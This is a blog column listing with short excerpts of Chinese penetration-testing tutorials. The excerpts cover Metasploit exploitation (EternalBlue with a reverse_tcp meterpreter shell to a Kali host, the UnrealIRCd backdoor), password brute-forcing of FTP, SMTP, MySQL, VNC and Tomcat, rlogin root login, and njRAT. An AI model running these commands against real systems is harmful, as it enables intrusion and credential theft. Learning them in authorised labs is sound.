web渗透
文章平均质量分 85
lao_wine
一个愿意为网络安全事业奋斗终生的人
展开
-
渗透必学html基础
title: HTML文章目录title: HTML一、基础1、简单的HTML页面架构2、HTML常见标签metalinkscript注释P标题标签brhr文本属性pre3、form表单和input标签form表单inputa标签、img标签、table标签aimg与areatable基础单选框、复选框,下拉选框、文本域下拉选框文本域 textarea本章综合示例列表无序列表有序列表补充frameset属性scrolling一、基础1、简单的HTML页面架构<!DOCTYPE html>.原创 2021-06-05 23:22:42 · 516 阅读 · 0 评论 -
详解黑客的攻击方式1---网络欺骗攻击
黑客的攻击方式1、网络欺骗攻击1.1、五种常见的网络欺骗方式1.2、网络钓鱼攻击概念1.3、网络钓鱼攻击的常用手段1.4、网络钓鱼攻击的预防1、网络欺骗攻击 网络信息安全是21世纪各国面临的重大挑战之一。我国面对这一挑战,已经做出了一些相应的研究和开发,例如:产品的加密解密、认证与访问控制、入侵检测与响应、安全分析与模拟、灾难恢复等。近年来,在实际的与入侵者周旋中网络欺骗作为一种有效的信息安全技术出现了1.1、五种常见的网络欺骗方式  原创 2021-03-19 23:09:25 · 9180 阅读 · 12 评论 -
攻防-域名信息、子域名收集、web站点信息收集、端口信息收集、敏感信息收集的方法、实践
文章目录一、域名信息收集域名介绍whois介绍whois查询备案信息查询二、子域名信息收集子域名介绍挖掘子域名的重要性子域名挖掘工具三、web站点信息收集CMS指纹识别四、端口信息收集端口介绍端口信息收集端口攻击防御措施五、敏感信息收集敏感信息收集的重要性Google Hack语法HTTP响应收集Server信息Github信息泄露一、域名信息收集域名介绍域名(Domain Name),是由一串用点分割的名字组成的internet上某一台计算机或计算机组的名称,用于计算机数据传输时标识计算机的电子方原创 2020-10-06 01:10:34 · 1398 阅读 · 0 评论 -
web渗透--权限维持
远程控制生成与上传metasploitmsfcoslesearch ms17-010use exploit/windows/smb/ms170_010_eternablueshow options设置rhostsshow payloadsset payload windows/x64/meterpreter/reverse_tcp 设置反弹shellshow optionsset lhost kali-IPexploit/run远程控制使用njRAT原创 2020-09-29 19:32:53 · 182 阅读 · 0 评论 -
web渗透--提权辅助工具Windows-Exploit-Suggester
辅助工具介绍辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。必须在python2环境中运行python2 -m pip install xlrdpython2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件python2 windows-exploit-suggester.py -husage: windows-expl原创 2020-09-23 18:50:34 · 494 阅读 · 0 评论 -
web渗透--提权基础
提权的本质提权本质就是提升自己在服务器中的权限,获得更大的权限提权分类本地提权远程提权系统提权第三方软件提权权限配置一般情况下,web服务会给与一个特定低权限用户维护服务,避免给与过高权限。net user username password /addWindows系统提权基础命令获取IP地址信息IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址。在提权过程中,如果外网IP地址,可以直接使用33原创 2020-09-23 03:16:17 · 485 阅读 · 0 评论 -
web渗透--tomcat管理密码破解
tomcat介绍tomcat服务器是一个免费的开放源码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合普遍使用,是开发和调试JSP程序的首选。默认8180端口是tomcat管理的HTTP端口探测目标tomcatnmap -sV 目标IP地址 -p 8180探测tomcat的版本信息msf破解tomcat密码msfconsoleuse auxiliary/scanner/http/tomcat_mgr_loginset rhost、 rportr原创 2020-09-13 03:04:27 · 803 阅读 · 0 评论 -
web渗透--irc后门利用
irc介绍IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。端口号默认的是6667号端口探测ircnmap -sV 目标IP地址 -p 端口号msf利用irc后门使用searchsploit查看可以利用的POCmsfconsoleuse exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset rhosts 目标IP地址runsessions -lsessions原创 2020-09-13 03:03:55 · 781 阅读 · 0 评论 -
web渗透--vnc密码破解
vnc介绍VNC(Virtual Network Console)是虚拟网络控制台的缩写。他是一款优秀的远程控制工具软件。可视化控制,类似于远程桌面。默认vnc服务端运行在5900端口。探测目标vncnmap -sV 目标IP地址 -p 5900获取vnc版本信息vnc破解在msf下vnc_login模块可用来对vnc服务端认证用户名和密码进行破解。msfconsoleuse auxiliary/scanner/vnc/vnc_loginshow optionetssset设原创 2020-09-12 01:44:56 · 1707 阅读 · 0 评论 -
web渗透--postgresql密码破解,简单漏洞利用
postgresql介绍postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。一般使用的是5432端口号。https://www.postgresql.org/探测postgresqlkeyinmap -sV 目标IP地址 -p 5432探测目标postgresql版本信息。msf下post原创 2020-09-12 01:44:25 · 1249 阅读 · 0 评论 -
web渗透--mysql弱口令破解
mysql介绍是一种关系数据库管理系统,关系数据库将数据保存在不同的表中。而不是将数据放在一个大仓库内,这样就提高了速度和灵活性。默认端口是3306www.mysql.com探测目标mysqlnmap -sV 目标IP地址 -p 端口探测mysql的版本信息msf破解mysql密码使用msf下的mysql_login模块破解mysql登录用户名和密码msfconsoleuse auxiliary/scanner/mysql/mysql_login设置目标IP地址 端口 用户名/原创 2020-09-10 17:16:34 · 543 阅读 · 0 评论 -
web渗透--nfs获取目标的密码文件
nfs介绍NFS(Network File System网络文件系统),是FreeBSD支持的文件系统的一种,允许网络中的计算机之间通过TCP/IP网络共享。在NFS应用中,本地的NFS的客户端可以透明地读写位于远端NFS服务器上的文件,就像浏览本地文件一样。nmap -sV 目标IP 查看是否打开了nfs一般nfs是2049号 端口探测nfsnmap --script=nfs-* 目标IP地址#探测nfs是否可以导出apt install nfs-common使用sho原创 2020-09-10 16:25:30 · 252 阅读 · 0 评论 -
web渗透--proftpd测试
proftpd介绍ProFTPD:是一个Unix平台或类Unix平台上的FTP服务器程序。http://www.proftpd.org探测目标proftpdnmap -sV 目标IP地址 -p 2121探测出目标的proftpd版本信息exploit-db搜索目标漏洞在https://www.exploit-db.com/ 输入对应软件及版本信息搜索是否有漏洞searchsploit 软件及版本号暴力破解使用metasploitmsfcosoleuse auxiliar原创 2020-09-10 16:24:55 · 386 阅读 · 0 评论 -
web渗透--反序列化远程漏洞利用
java rmi介绍JAVA RMI指的是远程方法调用(Remote Method Lovncation),是一种机制,可以让一个JAVA虚拟机上的对象去调用另外一个JAVA虚拟机上的对象的一种方法。RMI是J2SE的一部分,能够让程序员开发出基于Java的分布式应用,一个RMI对象是一个JAVA远程对象,可以从另一个JAVA虚拟机(或跨越网络)调用他的方法,可以像调用本地的JAVA对象一样调用远程JAVA对象。使分布在不同的JVM中的对象外表和行为都像本地对象一样,对于任何一个以对象为参数的RMI接口原创 2020-09-10 14:54:35 · 343 阅读 · 0 评论 -
web渗透--rlogin最高权限登
rlogin介绍远程登录(rhost)是一个UNIX的命令,它允许授权用户进入到网络中其他的UNIX机器,就像在现场操作一样。一旦进入主机,可以操作主机允许的任何事情。login、exec是标配。nmap 目标IP 查看端口号探测目标rlogin使用 nmap -sV 目标IP -p 端口号 探测目标rlogin版本信息exec对远程执行的进程进行验证login反弹bash shellrlogin最高权限登录rlogin -l root 目标IP地址原创 2020-09-10 14:54:00 · 561 阅读 · 0 评论 -
web渗透--samba RCE远程命令执行漏洞利用及修复
samba介绍samba是在linux与UNIX系统上实现SMB协议(文件共享协议,Server Messages Block,信息服务块)的一个免费软件。由服务端和客户端(C/S)程序构成。SMB是在局域网共享文件和打印机的一种通讯协议,他主要为局域网内的不同计算机之间提供文件、打印机等资源的共享服务,一般运行在139、445端口上。探测目标samba使用nmap -sV IP地址 -p 端口号 探测目标端口服务版本信息。metasploit漏洞利用使用metasploit集成的原创 2020-09-09 15:27:53 · 738 阅读 · 0 评论 -
web渗透--rpcbind利用
rpcbind介绍rpcbind是NFS(网络文件共享协议)中进行消息通知的服务,一般是111端口,并且NFS配置开启rpcbind_enable=“YES”探测目标rpcbindnmap -sV IP地址 -p 端口eg:nmap -sV 192.168.207.133 -p 111searchsplioit rpcbind //查看是否有可利用的脚本nmap脚本探测nmap使用nmap -p 端口号 --script=rpcinfo 目标IP地址 来探测目标IP地址的rpci原创 2020-09-09 14:40:28 · 7916 阅读 · 1 评论 -
web渗透--smtp暴力破解
1、smtp版本信息获取 1)、metasploit下smtp_version 2、medusa工具介绍 1)、-u/U 用户名/用户名文件 2)、-p/P 密码/密码文件 3)、-h/H IP地址/IP地址文件 4)、medusa -d 查看有什么模块 3、smtp验证方式 PLAIN、LOGIN、GSSAPI、DIGEST-MD5、MD5、...原创 2020-09-09 00:06:09 · 1835 阅读 · 0 评论 -
web渗透--枚举smtp用户名
1、telnet测试用户名 1)、telnet IP地址 端口 2)、vrfy 用户名@mail地址 2、metasploit测试用户名 1)、在metasploit中有smtp-enum可以对smtp上用户名进行枚举。 2)、use auxiliary/scanner/smtp/smtp_enum 3)、exploit/run 3)、smtp-user-enum测试用户名 ...原创 2020-09-09 00:05:09 · 1298 阅读 · 0 评论 -
telnet的的基本介绍,爆破,连接、提权
一、Telnel介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登录服务的标准协议和主要方式,他为使用者在本地计算机上完成远程主机工作的能力。Telnet简单实用,但因为是明文传送协议(安全性不足),所以并不被重用。一般服务器上都会禁用Telnet服务,要使用就要主动在服务端开启Telnet服务。Telnet默认使用的是23号端口。二、Telnet的版本号 1、nmap获取 1)、nmap IP地址。 2)、nmap -p...原创 2020-09-05 23:59:43 · 1114 阅读 · 0 评论 -
web渗透--telnet介绍、获取banner、爆破口令、连接
一、Telnel介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登录服务的标准协议和主要方式,他为使用者在本地计算机上完成远程主机工作的能力。Telnet简单实用,但因为是明文传送协议(安全性不足),所以并不被重用。一般服务器上都会禁用Telnet服务,要使用就要主动在服务端开启Telnet服务。Telnet默认使用的是23号端口。二、Telnet的版本号 1、nmap获取 1)、nmap IP地址。 2)、nmap -p...原创 2020-08-28 23:12:45 · 748 阅读 · 0 评论 -
web渗透--ssh环境搭建、banner获取。爆破口令、安全防范
一、SSH环境搭建 1、Ubuntu搭建ssh服务端 1)、安装软件openssh-server(apt-get install openssh-server) 2)、ssh服务端服务启动与关闭 service ssh start 启动 service ssh status 状态获取 service ssh stop 关闭 ...原创 2020-08-28 23:10:40 · 493 阅读 · 0 评论 -
web渗透--ftp暴力破解,明文、嗅探安全等
一、 FTP用户名密码暴力破解 1、知道用户名和密码nc直接相连 2、知道用户名不知道密码 1、medusa工具 medusa -d 可以查看可以破解模块都有什么 medusa -h IP地址 -u 用户名 -P 字典 ftp二、FTP用户名明文密码验证 1、FTP协议中用户认证的过程,客户端和用户端都是采用的明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。 2、用wireshark...原创 2020-08-27 00:28:23 · 1570 阅读 · 0 评论 -
web渗透--FTP安全
一、FTP协议介绍 1、文件传输协议(File Transfer Protocol,缩写:FTP),是网络上进行文件传输的一套标准协议,使用客户/服务器模式(C/S)模式。它属于网络传输协议的应用层。FTP使用21号端口。 2、FTP将用户分为3类:Real用户、Administrator(管理者)、匿名用户。 3、FTP文件传输格式分为了两类:ASCLL、二进制格式。二、FTP匿名登录漏洞 1、FTP默认是没有禁止匿名用户,所以可以进行Anonymous(匿名)...原创 2020-08-26 14:46:42 · 391 阅读 · 0 评论